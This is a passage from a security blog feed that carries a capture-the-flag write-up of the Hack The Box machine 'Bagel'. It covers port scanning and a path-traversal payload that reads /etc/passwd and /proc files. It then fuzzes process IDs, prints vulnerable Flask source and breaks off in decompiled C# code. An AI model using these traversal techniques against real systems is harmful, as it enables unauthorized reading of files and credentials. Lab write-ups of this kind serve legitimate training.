Dll Decompiling on CrippledMind's InfoSec Journalhttps://crippledmind-infosec-journal.netlify.app/tags/dll-decompiling/Recent content in Dll Decompiling on CrippledMind's InfoSec JournalHugo -- gohugo.ioen-usSun, 30 Jun 2024 18:26:06 +0530Bagelhttps://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/Sun, 30 Jun 2024 18:26:06 +0530https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/<h2 id="introduction">Introduction </h2><ul> <li><strong>Machine Name:</strong> Bagel</li> <li><strong>IP Address:</strong> 10.10.11.201</li> <li><strong>Difficulty:</strong> Medium</li> </ul> <h2 id="information-gathering">Information Gathering </h2><p>I started scan with <a class="link" href="https://github.com/RustScan/RustScan" target="_blank" rel="noopener" ><code>rustscan</code></a>, found port 22, 5000 and 8000 ports open.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="n">PORT</span> <span class="n">STATE</span> <span class="n">SERVICE</span> <span class="n">REASON</span> <span class="n">VERSION</span> </span></span><span class="line"><span class="cl"><span class="mi">22</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">ssh</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">OpenSSH</span> <span class="mf">8.8</span> <span class="p">(</span><span class="n">protocol</span> <span class="mf">2.0</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ssh</span><span class="o">-</span><span class="n">hostkey</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">6</span><span class="n">e</span><span class="p">:</span><span class="mi">4</span><span class="n">e</span><span class="p">:</span><span class="mi">13</span><span class="p">:</span><span class="mi">41</span><span class="p">:</span><span class="n">f2</span><span class="p">:</span><span class="n">fe</span><span class="p">:</span><span class="n">d9</span><span class="p">:</span><span class="n">e0</span><span class="p">:</span><span class="n">f7</span><span class="p">:</span><span class="mi">27</span><span class="p">:</span><span class="mi">5</span><span class="n">b</span><span class="p">:</span><span class="n">ed</span><span class="p">:</span><span class="n">ed</span><span class="p">:</span><span class="n">cc</span><span class="p">:</span><span class="mi">68</span><span class="p">:</span><span class="n">c2</span> <span class="p">(</span><span class="n">ECDSA</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">ecdsa</span><span class="o">-</span><span class="n">sha2</span><span class="o">-</span><span class="n">nistp256</span> <span class="n">AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBEwHzrBpcTXWKbxBWhc6yfWMiWfWjPmUJv2QqB</span><span class="o">/</span><span class="n">c2tJDuGt</span><span class="o">/</span><span class="mi">97</span><span class="n">OvgzC</span><span class="o">+</span><span class="n">Zs31X</span><span class="o">/</span><span class="n">IW2WM6P0rtrKemiz3C5mUE67k</span><span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="mi">256</span> <span class="mi">80</span><span class="p">:</span><span class="n">a7</span><span class="p">:</span><span class="n">cd</span><span class="p">:</span><span class="mi">10</span><span class="p">:</span><span class="n">e7</span><span class="p">:</span><span class="mi">2</span><span class="n">f</span><span class="p">:</span><span class="n">db</span><span class="p">:</span><span class="mi">95</span><span class="p">:</span><span class="mi">8</span><span class="n">b</span><span class="p">:</span><span class="mi">86</span><span class="p">:</span><span class="mi">9</span><span class="n">b</span><span class="p">:</span><span class="mi">1</span><span class="n">b</span><span class="p">:</span><span class="mi">20</span><span class="p">:</span><span class="mi">65</span><span class="p">:</span><span class="mi">2</span><span class="n">a</span><span class="p">:</span><span class="mi">98</span> <span class="p">(</span><span class="n">ED25519</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_ssh</span><span class="o">-</span><span class="n">ed25519</span> <span class="n">AAAAC3NzaC1lZDI1NTE5AAAAINnQ9frzL5hKjBf6oUklfUhQCMFuM0EtdYJOIxUiDuFl</span> </span></span><span class="line"><span class="cl"><span class="mi">5000</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">upnp</span><span class="err">?</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">fingerprint</span><span class="o">-</span><span class="n">strings</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">GetRequest</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">17</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTPOptions</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">34</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Help</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">44</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">52</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Keep</span><span class="o">-</span><span class="n">Alive</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="o">&lt;</span><span class="n">h1</span><span class="o">&gt;</span><span class="n">Bad</span> <span class="n">Request</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">request</span> <span class="n">line</span> <span class="p">(</span><span class="n">parts</span><span class="p">).)</span><span class="o">&lt;/</span><span class="n">h1</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">RTSPRequest</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">17</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">54</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Keep</span><span class="o">-</span><span class="n">Alive</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="o">&lt;</span><span class="n">h1</span><span class="o">&gt;</span><span class="n">Bad</span> <span class="n">Request</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">request</span> <span class="n">line</span> <span class="p">(</span><span class="n">version</span><span class="p">).)</span><span class="o">&lt;/</span><span class="n">h1</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">SSLSessionReq</span><span class="p">,</span> <span class="n">TerminalServerCookie</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">45</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">52</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Keep</span><span class="o">-</span><span class="n">Alive</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="o">&lt;</span><span class="n">h1</span><span class="o">&gt;</span><span class="n">Bad</span> <span class="n">Request</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">request</span> <span class="n">line</span> <span class="p">(</span><span class="n">parts</span><span class="p">).)</span><span class="o">&lt;/</span><span class="n">h1</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">TLSSessionReq</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">400</span> <span class="n">Bad</span> <span class="n">Request</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Microsoft</span><span class="o">-</span><span class="n">NetCore</span><span class="o">/</span><span class="mf">2.0</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">10</span><span class="p">:</span><span class="mi">16</span><span class="p">:</span><span class="mi">46</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">52</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">Keep</span><span class="o">-</span><span class="n">Alive</span><span class="p">:</span> <span class="kc">true</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="o">&lt;</span><span class="n">h1</span><span class="o">&gt;</span><span class="n">Bad</span> <span class="n">Request</span> <span class="p">(</span><span class="n">Invalid</span> <span class="n">request</span> <span class="n">line</span> <span class="p">(</span><span class="n">parts</span><span class="p">).)</span><span class="o">&lt;/</span><span class="n">h1</span><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="mi">8000</span><span class="o">/</span><span class="n">tcp</span> <span class="n">open</span> <span class="n">http</span> <span class="n">syn</span><span class="o">-</span><span class="n">ack</span> <span class="n">Werkzeug</span> <span class="n">httpd</span> <span class="mf">2.2.2</span> <span class="p">(</span><span class="n">Python</span> <span class="mf">3.10.9</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="o">|</span> <span class="n">http</span><span class="o">-</span><span class="n">methods</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_</span> <span class="n">Supported</span> <span class="n">Methods</span><span class="p">:</span> <span class="n">OPTIONS</span> <span class="n">GET</span> <span class="n">HEAD</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">server</span><span class="o">-</span><span class="n">header</span><span class="p">:</span> <span class="n">Werkzeug</span><span class="o">/</span><span class="mf">2.2.2</span> <span class="n">Python</span><span class="o">/</span><span class="mf">3.10.9</span> </span></span><span class="line"><span class="cl"><span class="o">|</span><span class="n">_http</span><span class="o">-</span><span class="n">title</span><span class="p">:</span> <span class="n">Did</span> <span class="ow">not</span> <span class="n">follow</span> <span class="n">redirect</span> <span class="n">to</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">bagel.htb</span><span class="p">:</span><span class="mi">8000</span><span class="o">/</span><span class="err">?</span><span class="n">page</span><span class="o">=</span><span class="n">index.html</span> </span></span></code></pre></div><h3 id="port-8000">Port 8000 </h3><p>Nmap scan shows this port running a werkzeug server. To get the domain name, i did a curl request, and added it to <code>/etc/hosts</code></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-lua" data-lang="lua"><span class="line"><span class="cl"><span class="err">❯</span> <span class="n">curl</span> <span class="o">-</span><span class="n">v</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="mf">10.10.11.201</span><span class="p">:</span><span class="mi">8000</span><span class="o">/</span> </span></span><span class="line"><span class="cl"><span class="o">*</span> <span class="n">Trying</span> <span class="mf">10.10.11.201</span><span class="p">:</span><span class="mf">8000.</span><span class="o">..</span> </span></span><span class="line"><span class="cl"><span class="o">*</span> <span class="n">Connected</span> <span class="n">to</span> <span class="mf">10.10.11.201</span> <span class="p">(</span><span class="mf">10.10.11.201</span><span class="p">)</span> <span class="n">port</span> <span class="mi">8000</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">GET</span> <span class="o">/</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">Host</span><span class="p">:</span> <span class="mf">10.10.11.201</span><span class="p">:</span><span class="mi">8000</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">User</span><span class="o">-</span><span class="n">Agent</span><span class="p">:</span> <span class="n">curl</span><span class="o">/</span><span class="mf">8.6.0</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">Accept</span><span class="p">:</span> <span class="o">*/*</span> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">HTTP</span><span class="o">/</span><span class="mf">1.1</span> <span class="mi">302</span> <span class="n">FOUND</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Server</span><span class="p">:</span> <span class="n">Werkzeug</span><span class="o">/</span><span class="mf">2.2.2</span> <span class="n">Python</span><span class="o">/</span><span class="mf">3.10.9</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Date</span><span class="p">:</span> <span class="n">Sun</span><span class="p">,</span> <span class="mi">30</span> <span class="n">Jun</span> <span class="mi">2024</span> <span class="mi">15</span><span class="p">:</span><span class="mi">14</span><span class="p">:</span><span class="mi">46</span> <span class="n">GMT</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Content</span><span class="o">-</span><span class="n">Type</span><span class="p">:</span> <span class="n">text</span><span class="o">/</span><span class="n">html</span><span class="p">;</span> <span class="n">charset</span><span class="o">=</span><span class="n">utf</span><span class="o">-</span><span class="mi">8</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Content</span><span class="o">-</span><span class="n">Length</span><span class="p">:</span> <span class="mi">263</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Location</span><span class="p">:</span> <span class="n">http</span><span class="p">:</span><span class="o">//</span><span class="n">bagel.htb</span><span class="p">:</span><span class="mi">8000</span><span class="o">/</span><span class="err">?</span><span class="n">page</span><span class="o">=</span><span class="n">index.html</span> </span></span><span class="line"><span class="cl"><span class="o">&lt;</span> <span class="n">Connection</span><span class="p">:</span> <span class="n">close</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="o">&gt;</span> <span class="n">echo</span> <span class="s1">&#39;10.10.11.201 bagel.htb&#39;</span> <span class="o">|</span> <span class="n">sudo</span> <span class="n">tee</span> <span class="o">-</span><span class="n">a</span> <span class="o">/</span><span class="n">etc</span><span class="o">/</span><span class="n">hosts</span> </span></span></code></pre></div><p>Now opening on browser, it redirects to <code>http://bagel.htb:8000/?page=index.html</code>. Now as soon as i see the <code>page</code> parameter, I immediately try for LFI(Local File Inclusion) to read <code>/etc/passwd</code> file. I got it by using <code>page=../../../../etc/passwd</code>.</p> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/lfi.png" width="2162" height="870" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/lfi_hua6771fb79e98d97fa2f8fe522149856f_397342_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/lfi_hua6771fb79e98d97fa2f8fe522149856f_397342_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="248" data-flex-basis="596px" ></p> <p>Looking at it, we see two users, <code>phil</code> and <code>developer</code>. Now time for extracting information. Anytime with an LFI, we can either</p> <ol> <li>try to get RCE via methods like log injection</li> <li>try to read user&rsquo;s id_rsa file, or</li> <li>try to read process env, process related commands executed.</li> </ol> <p>For this box, the first two options were dead end. Now for the third, first I read <code>/proc/self/environ</code> file. <div class="notice notice-info"> ===> The <span style="color: #d461e8">/proc/self/environ</span> file in a Unix-like operating system contains the environment variables for the current process. - ChatGPT </div></p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-env" data-lang="env"><span class="line"><span class="cl"><span class="nv">LANG</span><span class="o">=</span>en_US.UTF-8�PATH<span class="o">=</span>/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin�HOME<span class="o">=</span>/home/developer�LOGNAME<span class="o">=</span>developer�USER<span class="o">=</span>developer�SHELL<span class="o">=</span>/bin/bash�INVOCATION_ID<span class="o">=</span>eb44fe42161641c2b1239494b788bb59�JOURNAL_STREAM<span class="o">=</span>8:25511�SYSTEMD_EXEC_PID<span class="o">=</span>894� </span></span></code></pre></div><p>This shows our current user is <code>developer</code>. Similarly, <code>/proc/self/cmdline</code>, will hold the current process commands run. This file had the content = <code>python3/home/developer/app/app.py</code>. So reading this file now gave me the app&rsquo;s starting code,</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">from</span> <span class="nn">flask</span> <span class="kn">import</span> <span class="n">Flask</span><span class="p">,</span> <span class="n">request</span><span class="p">,</span> <span class="n">send_file</span><span class="p">,</span> <span class="n">redirect</span><span class="p">,</span> <span class="n">Response</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">os.path</span> </span></span><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">websocket</span><span class="o">,</span><span class="nn">json</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">app</span> <span class="o">=</span> <span class="n">Flask</span><span class="p">(</span><span class="vm">__name__</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">index</span><span class="p">():</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="s1">&#39;page&#39;</span> <span class="ow">in</span> <span class="n">request</span><span class="o">.</span><span class="n">args</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="n">page</span> <span class="o">=</span> <span class="s1">&#39;static/&#39;</span><span class="o">+</span><span class="n">request</span><span class="o">.</span><span class="n">args</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="s1">&#39;page&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">isfile</span><span class="p">(</span><span class="n">page</span><span class="p">):</span> </span></span><span class="line"><span class="cl"><span class="n">resp</span><span class="o">=</span><span class="n">send_file</span><span class="p">(</span><span class="n">page</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="n">resp</span><span class="o">.</span><span class="n">direct_passthrough</span> <span class="o">=</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">getsize</span><span class="p">(</span><span class="n">page</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="n">resp</span><span class="o">.</span><span class="n">headers</span><span class="p">[</span><span class="s2">&#34;Content-Length&#34;</span><span class="p">]</span><span class="o">=</span><span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">resp</span><span class="o">.</span><span class="n">get_data</span><span class="p">()))</span> </span></span><span class="line"><span class="cl"><span class="k">return</span> <span class="n">resp</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="k">return</span> <span class="s2">&#34;File not found&#34;</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"><span class="k">return</span> <span class="n">redirect</span><span class="p">(</span><span class="s1">&#39;http://bagel.htb:8000/?page=index.html&#39;</span><span class="p">,</span> <span class="n">code</span><span class="o">=</span><span class="mi">302</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="nd">@app.route</span><span class="p">(</span><span class="s1">&#39;/orders&#39;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">order</span><span class="p">():</span> <span class="c1"># don&#39;t forget to run the order app first with &#34;dotnet &lt;path to .dll&gt;&#34; command. Use your ssh key to access the machine.</span> </span></span><span class="line"><span class="cl"> <span class="k">try</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">ws</span> <span class="o">=</span> <span class="n">websocket</span><span class="o">.</span><span class="n">WebSocket</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="n">ws</span><span class="o">.</span><span class="n">connect</span><span class="p">(</span><span class="s2">&#34;ws://127.0.0.1:5000/&#34;</span><span class="p">)</span> <span class="c1"># connect to order app</span> </span></span><span class="line"><span class="cl"> <span class="n">order</span> <span class="o">=</span> <span class="p">{</span><span class="s2">&#34;ReadOrder&#34;</span><span class="p">:</span><span class="s2">&#34;orders.txt&#34;</span><span class="p">}</span> </span></span><span class="line"><span class="cl"> <span class="n">data</span> <span class="o">=</span> <span class="nb">str</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">order</span><span class="p">))</span> </span></span><span class="line"><span class="cl"> <span class="n">ws</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="n">result</span> <span class="o">=</span> <span class="n">ws</span><span class="o">.</span><span class="n">recv</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">(</span><span class="n">json</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">result</span><span class="p">)[</span><span class="s1">&#39;ReadOrder&#39;</span><span class="p">])</span> </span></span><span class="line"><span class="cl"> <span class="k">except</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="k">return</span><span class="p">(</span><span class="s2">&#34;Unable to connect&#34;</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">&#39;__main__&#39;</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="n">app</span><span class="o">.</span><span class="n">run</span><span class="p">(</span><span class="n">host</span><span class="o">=</span><span class="s1">&#39;0.0.0.0&#39;</span><span class="p">,</span> <span class="n">port</span><span class="o">=</span><span class="mi">8000</span><span class="p">)</span> </span></span></code></pre></div><p>Looking at the code, I got to know that a websocket server is running in port 5000 that is responsible for the managing orders. It is using a json payload to i guess read orders.txt file to fetch the orders placed. Going to the <code>bagel.htb:5000/orders</code> confirms this. Also there are two interesting comments here, <div class="notice notice-note"> ===> don't forget to run the order app first with "dotnet '&lt;path to .dll&gt;' command. Use your ssh key to access the machine. </div> From first line, it is clear that a <code>dll</code> file is running as I am able to access the orders. This meant, I will be able to exfil info of dll from <code>/proc/{proc_no}/cmdline</code> to know the commands run. <div class="notice notice-info"> ===> The file <span style="color: #d461e8">/proc/{proc_no}/cmdline</span> in a Unix-like operating system (such as Linux) contains the command-line arguments passed to the process with the process ID {proc_no} when it was started. - ChatGPT </div> Second line says to use ssh key. So hinting at us to read <code>id_rsa</code> file of a user. Now I dont know the process number of a dll file. So i will brute force the <code>proc_no</code> param from 1 to 1000.</p> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/fuzzing.png" width="1870" height="784" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/fuzzing_hu24143c41584565b1b73b1667aec7d463_227968_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/fuzzing_hu24143c41584565b1b73b1667aec7d463_227968_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="238" data-flex-basis="572px" ></p> <!-- ---------------------------------------------------------------------- --> <p>Now sorting all the responses by size, I found</p> <p><img src="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/bagelinfo.png" width="1874" height="586" srcset="https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/bagelinfo_hu51588849dcf01ee5688c8a760039eee5_287518_480x0_resize_box_3.png 480w, https://crippledmind-infosec-journal.netlify.app/posts/writeups/htb/bagel/bagelinfo_hu51588849dcf01ee5688c8a760039eee5_287518_1024x0_resize_box_3.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="319" data-flex-basis="767px" ></p> <!-- ---------------------------------------------------------------------- --> <p>I used this path in <code>page</code> parameter on port 8000 to downlaod the file. To debug this dll file, there are many options, <a class="link" href="https://github.com/dnSpy/dnSpy" target="_blank" rel="noopener" ><code>dnSpy</code></a>, <a class="link" href="https://www.jetbrains.com/decompiler/" target="_blank" rel="noopener" ><code>dotPeek</code></a>, <a class="link" href="https://www.jetbrains.com/rider/" target="_blank" rel="noopener" ><code>Rider</code></a>, <a class="link" href="https://ghidra-sre.org/" target="_blank" rel="noopener" ><code>Ghidra</code></a> etc. I am using <code>Rider</code>. Looking at the <code>Bagel.cs</code> file, the function <code>MessageRecieved</code> is deserialising the recieved request json payload from the client.</p> <div class="highlight"><pre tabindex="0" class="chroma"><code class="language-csharp" data-lang="csharp"><span class="line"><span class="cl"><span class="kd">private</span> <span class="kd">static</span> <span class="k">void</span> <span class="n">MessageReceived</span><span class="p">(</span><span class="kt">object</span> <span class="n">sender</span><span class="p">,</span> <span class="n">MessageReceivedEventArgs</span> <span class="n">args</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="p">{</span> </span></span><span class="line"><span class="cl"> <span class="kt">string</span> <span class="n">json</span> <span class="p">=</span> <span class="s">&#34;&#34;</span><span class="p">;</span> </span></span><span class="line"><span 